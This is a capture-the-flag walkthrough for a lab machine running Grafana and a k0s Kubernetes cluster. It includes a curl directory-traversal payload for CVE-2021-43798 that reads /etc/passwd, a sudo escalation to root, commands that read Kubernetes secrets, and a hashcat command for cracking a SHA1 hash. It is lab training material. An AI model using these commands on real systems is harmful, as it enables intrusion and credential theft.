Task 1 - Access the cluster
Find the username
Launch an enumeration with nmap
1
nmap -sV -sC <ip> -v
We discover several open port, let’s try to access to check what is behind. port 3000 is linked to a Grafana solution where we can see the version 8.3.0 in the footer. port 5000 seems a javascript application. Let’s explore the javascript application first. Have a look on the source code page and the network trace. Source code of the page list a css file. Have a look on it to discover an itnerresting link on pastebin. This look like a base64 string and decode. It is not valid, change to base32 and decode again.
Here is the username.
Find the password
Launch an enumeration with nmap
1
nmap -sV -sC <ip> -v
We discover several open port, let’s try to access to check what is behind. port 3000 is linked to a Grafana solution where we can see the version 8.3.0 in the footer. port 5000 seems a javascript application. Let’s explore the grafana track with a look on exploit-db webpage. There is an existing vulnerabilities on this version which allow Directory Traversal (CVE 2021-43798). Have a look to the vulnerabilities to reproduce it with curl
1
curl http://<ip>:3000/public/plugins/alertlist/../../../../../../../../../../etc/passwd --path-as-is
–path-as-is to tell curl to not handle sequences of /../ in the given URL path (check man page)
Here is the password.
Task 2 - Your secret crush
You can now SSH to the target machine with previous username and password.
A simple sudo -l show us that we can be easily root through
1
sudo bash
Then, check which processes are running on the server
1
ps -aux
If you look in details, you discover a k0s distribution running.
1
k0s kubectl get secret
Edit the secret to found a base64 string to convert.
Task 3 - Game of Pods
First, identify the pods running on the system with
1
k0s kubectl get pods -A
-A means to look on all namespaces
A google research show us that pod data is hosted on /var/lib/k0s/contanerd directory.
After patience, we found the right directory with a git folder inside. /var/lib/k0s/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/38/fs/home/ubuntu/jokes
1
git log
It allow us to check the last commit and
1
git show <id>
let us have a look on each commit. this one sounds very interresting to answer the task.
1
git show 4b2c2d74b31d922252368c112a3907c5c1cf1ba3
Task 4 - Hack a job at FANG
intership is a pod name, let’s enumerate the job to found a sha1 hash to be cracked with hashcat
1
hashcat -m 100 -w 3 -D 1,2 26c3d1c068e7e01599c3612447410b5e56c779f1 rockyou.txt